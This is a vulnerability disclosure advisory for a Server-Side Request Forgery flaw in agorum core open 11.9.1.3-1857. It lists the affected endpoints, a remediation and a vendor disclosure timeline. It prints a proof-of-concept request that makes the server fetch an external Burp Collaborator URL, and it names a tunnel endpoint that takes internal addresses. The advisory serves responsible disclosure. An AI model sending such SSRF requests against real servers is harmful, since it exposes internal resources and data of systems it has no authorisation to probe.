usd-2025-0025 | Agorum core open 11.9.1.3-1857 - Server-Side Request Forgery (SSRF)

Product: Agorum core open
Affected Version: 11.9.1.3-1857
Vulnerability Type: Server-Side Request Forgery (SSRF) (CWE-918)
Security Risk: High
Vendor: Agorum
Vendor URL: https://www.agorum.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: Requested
CVE Link: Requested
Advisory ID: usd-2025-0025

Description

agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.

Proof of Concept

Several endpoints in the application are vulnerable to Server-Side Request Forgery (SSRF). This allows attackers to craft requests that cause the server to initiate connections to arbitrary internal or external resources, potentially exposing sensitive information or enabling further attacks.

The following request demonstrates the SSRF vulnerability. When submitted, the server makes a request to the specified URL:

GET /roiwebui/desk4web_module/gadgets/rssreader/RSSReader.jsp?reloadTime=600000);}&feed=[http://etbjk99mmtvsce0wjfkmjof3zu5ntdh2.burp.usd.de/ssrf]() HTTP/1.1
Host: localhost
[...]

In the response, it is evident that the server has fetched content from the target resource, confirming the SSRF behavior:

HTTP/1.1 200 OK
X-Powered-By: agorum core
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 1422
Date: Fri, 02 May 2025 07:48:55 GMT
Server: Apache-Coyote/1.1
[...]
    <body onload="initReload()">
        <div class="tableblock">
        <table>
            <!-- <html><body>xjiz55z1r9egabbtzruo7czjlgigz</body></html>-->
            <th>null</th>
        </table>
        </div>
    </body>
[...]

To further demonstrate the server's outbound request capabilities, a payload was sent to a Burp Collaborator URL. The interaction received confirms the SSRF vulnerability and shows that the server can establish external network connections:

The vulnerability is present in multiple locations. The following is a non-exhaustive list of affected endpoints:

• /roiwebui/desk4web_module/gadgets/rssreader/RSSReader.jsp
• /roiwebui/TunnelServlet?tunnelAddress=127.0.0.1&tunnelPort=1234

Fix

It is recommended to evaluate whether making server-side requests is necessary for the functionality of the application.
Should this is the case, the security measures to be implemented depend on the type of server-side requests:
If the application only needs to be able to make requests to a precisely defined set of systems, these can be included in an allowlist.
On the other hand, if the application should be able to make requests to arbitrary external resources via the Internet, an allowlist cannot be used, as for this purpose it is not possible to define a set of permitted systems in advance.
Instead, a ruleset describing disallowed requests, a denylist, should be defined to reflect the expected format of legitimate requests.

Users of agorum core open can upgrade to versions 11.9.2 and 11.10.1.

References

• https://cwe.mitre.org/data/definitions/918.html

Timeline

• 2025-05-05: First contact request via mail.
• 2025-05-05: The vendor has confirmed the delivery and has begun investigating the matter.
• 2025-05-07: The vendor has begun addressing and fixing the issue.
• 2025-05-15: The vendor has addressed and fixed the vulnerability within the cloud instances.
• 2025-05-30: The vendor released fixed versions 11.9.2 and 11.10.1.
• 2025-06-27: This advisory is published.

Credits

This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.